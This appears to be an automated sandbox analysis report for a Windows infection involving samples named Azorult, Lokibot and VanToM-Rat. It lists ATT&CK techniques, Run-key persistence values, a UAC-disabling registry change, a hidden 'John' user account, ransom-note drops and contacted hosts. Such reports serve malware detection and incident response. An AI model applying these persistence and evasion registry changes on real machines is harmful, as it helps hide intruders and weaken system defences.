Set value (str)	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Delete Cached Standalone Update Binary = "C:\\Windows\\system32\\cmd.exe /q /c del /q \"C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdater\\OneDriveSetup.exe\""	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000\Software\Microsoft\Windows\CurrentVersion\Run\ButterflyOnDesktop	butterflyondesktop.tmp
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe"	taskhostw.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000\Software\Microsoft\Windows\CurrentVersion\Run\Server = "C:\\Users\\Admin\\Downloads\\VanToM-Rat.bat"	VanToM-Rat.bat
Set value (str)	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000\Software\Microsoft\Windows\CurrentVersion\Run\Server = "C:\\Users\\Admin\\AppData\\Roaming\\VanToM Folder\\Server.exe"	Server.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Delete Cached Update Binary = "C:\\Windows\\system32\\cmd.exe /q /c del /q \"C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\Update\\OneDriveSetup.exe\""	OneDriveSetup.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 1 IoCs

defense_evasion trojan

System Information Discovery

T1082

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Azorult.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1004	powershell.exe

Drops desktop.ini file(s) 27 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	OneDrive.exe
File opened for modification	C:\Users\Admin\Links\desktop.ini	OneDrive.exe
File opened for modification	C:\Users\Admin\Music\desktop.ini	OneDrive.exe
File opened for modification	C:\Users\Admin\Videos\Captures\desktop.ini	OneDrive.exe
File opened for modification	C:\Users\Public\Music\desktop.ini	OneDrive.exe
File opened for modification	C:\Users\Public\Videos\desktop.ini	OneDrive.exe
File opened for modification	C:\Users\Public\desktop.ini	OneDrive.exe
File opened for modification	C:\Program Files\desktop.ini	OneDrive.exe
File opened for modification	C:\Users\Admin\Downloads\desktop.ini	OneDrive.exe
File opened for modification	C:\Users\Admin\Favorites\desktop.ini	OneDrive.exe
File opened for modification	C:\Users\Admin\Saved Games\desktop.ini	OneDrive.exe
File opened for modification	C:\Users\Public\AccountPictures\desktop.ini	OneDrive.exe
File opened for modification	C:\Users\Public\Documents\desktop.ini	OneDrive.exe
File opened for modification	C:\Users\Public\Downloads\desktop.ini	OneDrive.exe
File opened for modification	C:\Users\Public\Libraries\desktop.ini	OneDrive.exe
File opened for modification	C:\Users\Admin\OneDrive\desktop.ini	FileSyncConfig.exe
File opened for modification	C:\Program Files (x86)\desktop.ini	OneDrive.exe
File opened for modification	C:\Users\Admin\Contacts\desktop.ini	OneDrive.exe
File opened for modification	C:\Users\Admin\Documents\desktop.ini	OneDrive.exe
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	OneDrive.exe
File opened for modification	C:\Users\Admin\Searches\desktop.ini	OneDrive.exe
File opened for modification	C:\Users\Public\Desktop\desktop.ini	OneDrive.exe
File opened for modification	C:\Users\Public\Pictures\desktop.ini	OneDrive.exe
File opened for modification	C:\Users\Admin\Videos\Captures\desktop.ini	svchost.exe
File opened for modification	C:\Users\Admin\Favorites\Links\desktop.ini	OneDrive.exe
File opened for modification	C:\Users\Admin\OneDrive\desktop.ini	OneDrive.exe
File opened for modification	C:\Users\Admin\Videos\desktop.ini	OneDrive.exe

Indicator Removal: Clear Persistence 1 TTPs 2 IoCs

Clear artifacts associated with previously established persistence like scheduletasks on a host.

defense_evasion

Clear Persistence

T1070.009

pid	Process
6460	cmd.exe
4184	cmd.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 19 IoCs

Web Service

T1102

flow	ioc
405	camo.githubusercontent.com
662	camo.githubusercontent.com
663	raw.githubusercontent.com
940	raw.githubusercontent.com
735	camo.githubusercontent.com
939	raw.githubusercontent.com
939	iplogger.org
405	raw.githubusercontent.com
446	raw.githubusercontent.com
449	camo.githubusercontent.com
636	camo.githubusercontent.com
664	camo.githubusercontent.com
665	camo.githubusercontent.com
683	camo.githubusercontent.com
684	camo.githubusercontent.com
409	raw.githubusercontent.com
942	iplogger.org
944	raw.githubusercontent.com
947	raw.githubusercontent.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
828	bot.whatismyipaddress.com
928	ip-api.com

Mark of the Web detected: This indicates that the page was originally saved or cloned. 1 IoCs

phishing motw

flow	ioc	pid	Process
367	https://storage.googleapis.com/script.aniview.com/ssync/62f53b2c7850d0786f227f64/ssync.html	2984	firefox.exe

Modifies WinLogon 2 TTPs 7 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"	RDPWInst.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	Azorult.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	Azorult.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	Azorult.exe

Network Service Discovery 1 TTPs 1 IoCs

Attempt to gather information on host's network.

discovery

Network Service Discovery

T1046

pid	Process
7956	GameBarPresenceWriter.exe

Password Policy Discovery 1 TTPs
Attempt to access detailed information about the password policy used within an enterprise network.
discovery

Password Policy Discovery
T1201

AutoIT Executable 4 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x000c00000002bc79-13510.dat	autoit_exe
behavioral1/files/0x000c00000002bccc-13599.dat	autoit_exe
behavioral1/files/0x000500000002bbec-13724.dat	autoit_exe
behavioral1/memory/6324-13992-0x0000000000FF0000-0x00000000010DC000-memory.dmp	autoit_exe

Checks system information in the registry 2 TTPs 6 IoCs

System information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer	OneDriveSetup.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName	OneDriveSetup.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer	OneDrive.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName	OneDrive.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer	OneDriveSetup.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName	OneDriveSetup.exe

Drops file in System32 directory 5 IoCs

description	ioc	Process
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	powershell.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	powershell.exe
File created	C:\Windows\System32\rfxvmt.dll	RDPWInst.exe
File opened for modification	C:\Windows\System32\GroupPolicy	powershell.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	powershell.exe

Hide Artifacts: Hidden Users 1 TTPs 4 IoCs

defense_evasion

Hidden Users

T1564.002

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\john = "0"	reg.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1452 set thread context of 3328	1452	Lokibot.exe	603

UPX packed file 9 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000d00000002bd1c-13887.dat	upx
behavioral1/memory/1220-13893-0x0000000000400000-0x0000000000419000-memory.dmp	upx
behavioral1/memory/1220-13927-0x0000000000400000-0x0000000000419000-memory.dmp	upx
behavioral1/files/0x000c00000002bd3c-13984.dat	upx
behavioral1/memory/6324-13989-0x0000000000FF0000-0x00000000010DC000-memory.dmp	upx
behavioral1/memory/6324-13992-0x0000000000FF0000-0x00000000010DC000-memory.dmp	upx
behavioral1/files/0x000d00000002bd5b-14389.dat	upx
behavioral1/memory/4840-14494-0x0000000000400000-0x0000000000409000-memory.dmp	upx
behavioral1/memory/4840-14511-0x0000000000400000-0x0000000000409000-memory.dmp	upx

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_321.14700.0.9_x64__cw5n1h2txyewy\Dashboard\WebContent\node_modules\@fluentui\react\lib-amd\components\DocumentCard\DocumentCardLogo.js	OneDrive.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\delete.svg	OneDrive.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ro-ro\ui-strings.js	OneDrive.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\sv-se\YOUR_FILES_ARE_ENCRYPTED.HTML	OneDrive.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.GetHelp_10.2008.32311.0_x64__8wekyb3d8bbwe\Assets\GetHelpAppList.targetsize-60_altform-lightunplated.png	OneDrive.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\contrast-white\MediumTile.scale-100_contrast-white.png	OneDrive.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.21012.10511.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\contrast-white\Logo.scale-100_contrast-white.png	OneDrive.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\icons_ie8.gif	OneDrive.exe
File opened for modification	C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_321.14700.0.9_x64__cw5n1h2txyewy\Dashboard\WebContent\node_modules\@fluentui\react\lib-commonjs\components\GroupedList\GroupedList.base.js	OneDrive.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12827.20400.0_x64__8wekyb3d8bbwe\images\HxCalendarAppList.targetsize-72_altform-lightunplated.png	OneDrive.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\themes\dark\hscroll-thumb.png	OneDrive.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\rhp_world_icon_hover.png	OneDrive.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\themes\dark\illustrations_retina.png	OneDrive.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\ADDINS\PowerPivot Excel Add-in\Cartridges\orcl7.xsl	OneDrive.exe
File opened for modification	C:\Program Files\Microsoft Office\root\rsod\onenotemui.msi.16.en-us.tree.dat	OneDrive.exe
File opened for modification	C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_321.14700.0.9_x64__cw5n1h2txyewy\Dashboard\WebContent\node_modules\@fluentui\theme\node_modules\@uifabric\merge-styles\lib-amd\keyframes.js	OneDrive.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\root\YOUR_FILES_ARE_ENCRYPTED.HTML	OneDrive.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\nl-nl\ui-strings.js	OneDrive.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\sk-sk\ui-strings.js	OneDrive.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Getstarted_10.2.41172.0_x64__8wekyb3d8bbwe\Assets\TipsAppList.targetsize-20_altform-unplated_contrast-black.png	OneDrive.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.40831.0_x64__8wekyb3d8bbwe\Assets\contrast-white\BadgeLogo.scale-200_contrast-white.png	OneDrive.exe
File opened for modification	C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_321.14700.0.9_x64__cw5n1h2txyewy\Dashboard\WebContent\node_modules\@fluentui\react\lib-amd\FocusZone.js	OneDrive.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\en-il\YOUR_FILES_ARE_ENCRYPTED.HTML	OneDrive.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.YourPhone_0.19051.7.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\AppTiles\contrast-black\LargeTile.scale-125_contrast-black.png	OneDrive.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.6.3102.0_x64__8wekyb3d8bbwe\Win10\MicrosoftSolitaireAppList.scale-100.png	OneDrive.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_1.0.22.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-white\MapsStoreLogo.scale-200_contrast-white.png	OneDrive.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.21012.10511.0_x64__8wekyb3d8bbwe\Assets\contrast-black\LargeLogo.scale-200_contrast-black.png	OneDrive.exe
File opened for modification	C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_321.14700.0.9_x64__cw5n1h2txyewy\Dashboard\WebContent\node_modules\@fluentui\theme\node_modules\@uifabric\utilities\lib-amd\warn\warnDeprecations.js	OneDrive.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\zh-tw\ui-strings.js	OneDrive.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.BingWeather_1.0.6.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-white\WeatherAppList.targetsize-48_altform-unplated_contrast-white.png	OneDrive.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.BingWeather_1.0.6.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherAppList.targetsize-32.png	OneDrive.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Paint_10.2104.17.0_x64__8wekyb3d8bbwe\Assets\PaintAppList.targetsize-72.png	OneDrive.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.PowerAutomateDesktop_1.0.65.0_x64__8wekyb3d8bbwe\Images\contrast-white\PowerAutomateSplashScreen.scale-100.png	OneDrive.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.PowerAutomateDesktop_1.0.65.0_x64__8wekyb3d8bbwe\Images\PowerAutomateAppIcon.scale-400.png	OneDrive.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_1.0.36.0_x64__8wekyb3d8bbwe\Assets\AlarmsAppList.targetsize-80.png	OneDrive.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12827.20400.0_x64__8wekyb3d8bbwe\images\contrast-white\HxCalendarWideTile.scale-150.png	OneDrive.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsNotepad_10.2102.13.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\NotepadMedTile.scale-100.png	OneDrive.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.6.10571.0_x64__8wekyb3d8bbwe\Images\Square44x44Logo.scale-125.png	OneDrive.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ext.txt	OneDrive.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\requests\browse.xml	OneDrive.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.XboxGamingOverlay_2.50.24002.0_neutral_split.scale-125_8wekyb3d8bbwe\AppxBlockMap.xml	OneDrive.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.2012.21.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-256.png	OneDrive.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.21012.10511.0_neutral_split.scale-100_8wekyb3d8bbwe\AppxBlockMap.xml	OneDrive.exe
File opened for modification	C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_321.14700.0.9_x64__cw5n1h2txyewy\Dashboard\WebContent\node_modules\@fluentui\react\lib-commonjs\components\GroupedList\GroupedList.js	OneDrive.exe
File opened for modification	C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_321.14700.0.9_x64__cw5n1h2txyewy\Dashboard\WebContent\node_modules\@fluentui\react\lib-commonjs\Theme.js	OneDrive.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\images\YOUR_FILES_ARE_ENCRYPTED.HTML	OneDrive.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Paint_10.2104.17.0_x64__8wekyb3d8bbwe\Assets\contrast-black\PaintAppList.targetsize-60_altform-unplated.png	OneDrive.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12827.20400.0_x64__8wekyb3d8bbwe\images\contrast-white\EmptyShare.scale-150.png	OneDrive.exe
File opened for modification	C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_321.14700.0.9_x64__cw5n1h2txyewy\Dashboard\WebContent\node_modules\@fluentui\theme\node_modules\@uifabric\utilities\lib-amd\customizations\mergeSettings.js	OneDrive.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\index.html	OneDrive.exe
File created	C:\Program Files\Java\jdk-1.8\jre\lib\deploy\YOUR_FILES_ARE_ENCRYPTED.HTML	OneDrive.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogo.scale-180.png	OneDrive.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ZuneVideo_10.21012.10511.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\contrast-black\WideLogo.scale-125_contrast-black.png	OneDrive.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.BingWeather_1.0.6.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-white\WeatherAppList.targetsize-48_altform-lightunplated_contrast-white.png	OneDrive.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ScreenSketch_11.2104.2.0_x64__8wekyb3d8bbwe\Assets\SnipSketchAppList.targetsize-72_altform-unplated.png	OneDrive.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12827.20400.0_x64__8wekyb3d8bbwe\images\contrast-black\LinkedInboxSmallTile.scale-125.png	OneDrive.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\pl-pl\YOUR_FILES_ARE_ENCRYPTED.HTML	OneDrive.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\cs-cz\YOUR_FILES_ARE_ENCRYPTED.HTML	OneDrive.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Getstarted_10.2.41172.0_x64__8wekyb3d8bbwe\Assets\TipsAppList.targetsize-24_altform-unplated.png	OneDrive.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12827.20400.0_x64__8wekyb3d8bbwe\images\contrast-white\OutlookMailLargeTile.scale-400.png	OneDrive.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12827.20400.0_x64__8wekyb3d8bbwe\images\contrast-white\HxMailSplashLogo.scale-100.png	OneDrive.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12827.20400.0_x64__8wekyb3d8bbwe\images\contrast-white\ExchangeLargeTile.scale-150.png	OneDrive.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12827.20400.0_x64__8wekyb3d8bbwe\images\LinkedInboxMediumTile.scale-400.png	OneDrive.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.6.10571.0_x64__8wekyb3d8bbwe\Images\LockScreenLogo.scale-150_contrast-white.png	OneDrive.exe

Drops file in Windows directory 64 IoCs

description	ioc	Process
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping7496_869885058\manifest.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping7496_2127160454\hyph-cy.hyb	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping7496_2127160454\hyph-nb.hyb	msedge.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagerr.xml	UserOOBEBroker.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping7496_1162047595\LICENSE	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping7496_698300666\edge_autofill_global_block_list.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping7496_698300666\manifest.fingerprint	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping7496_887327931\manifest.fingerprint	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping7496_2127160454\hyph-bn.hyb	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping7496_2127160454\hyph-eu.hyb	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping7496_2127160454\hyph-hu.hyb	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping7496_834575469\manifest.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping7496_2127160454\hyph-da.hyb	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping7496_2127160454\hyph-kn.hyb	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping7496_2127160454\hyph-mul-ethi.hyb	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping7496_2127160454\hyph-sv.hyb	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping7496_2127160454\hyph-ta.hyb	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping7496_869885058\data.txt	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping7496_2127160454\hyph-en-gb.hyb	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping7496_2127160454\hyph-pa.hyb	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping7496_2127160454\manifest.fingerprint	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping7496_283049485\manifest.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping7496_834575469\well_known_domains.dll	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping7496_2127160454\hyph-bg.hyb	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping7496_2127160454\hyph-cs.hyb	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping7496_2127160454\hyph-de-1901.hyb	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping7496_2127160454\hyph-de-ch-1901.hyb	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping7496_2127160454\hyph-et.hyb	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping7496_2127160454\hyph-hy.hyb	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping7496_283049485\ct_config.pb	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping7496_626478520\manifest.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping7496_2127160454\hyph-cu.hyb	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping7496_2127160454\hyph-lv.hyb	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping7496_2127160454\hyph-mr.hyb	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping7496_2127160454\hyph-sl.hyb	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping7496_2127160454\hyph-und-ethi.hyb	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping7496_2127160454\hyph-hi.hyb	msedge.exe
File opened for modification	C:\Windows\SystemTemp	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping7496_869885058\manifest.fingerprint	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping7496_2127160454\hyph-as.hyb	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping7496_2127160454\hyph-be.hyb	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping7496_2127160454\hyph-de-1996.hyb	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping7496_2127160454\hyph-ga.hyb	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping7496_2127160454\hyph-nn.hyb	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping7496_1162047595\_metadata\verified_contents.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping7496_283049485\crs.pb	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping7496_2127160454\hyph-en-us.hyb	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping7496_2127160454\hyph-gl.hyb	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping7496_2127160454\hyph-ml.hyb	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping7496_2127160454\hyph-or.hyb	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping7496_2127160454\hyph-sk.hyb	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping7496_1162047595\manifest.fingerprint	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping7496_698300666\regex_patterns.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping7496_887327931\typosquatting_list.pb	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping7496_283049485\kp_pinslist.pb	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping7496_283049485\manifest.fingerprint	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping7496_2127160454\hyph-ru.hyb	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping7496_2127160454\hyph-tk.hyb	msedge.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setuperr.log	UserOOBEBroker.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping7496_2127160454\hyph-te.hyb	msedge.exe
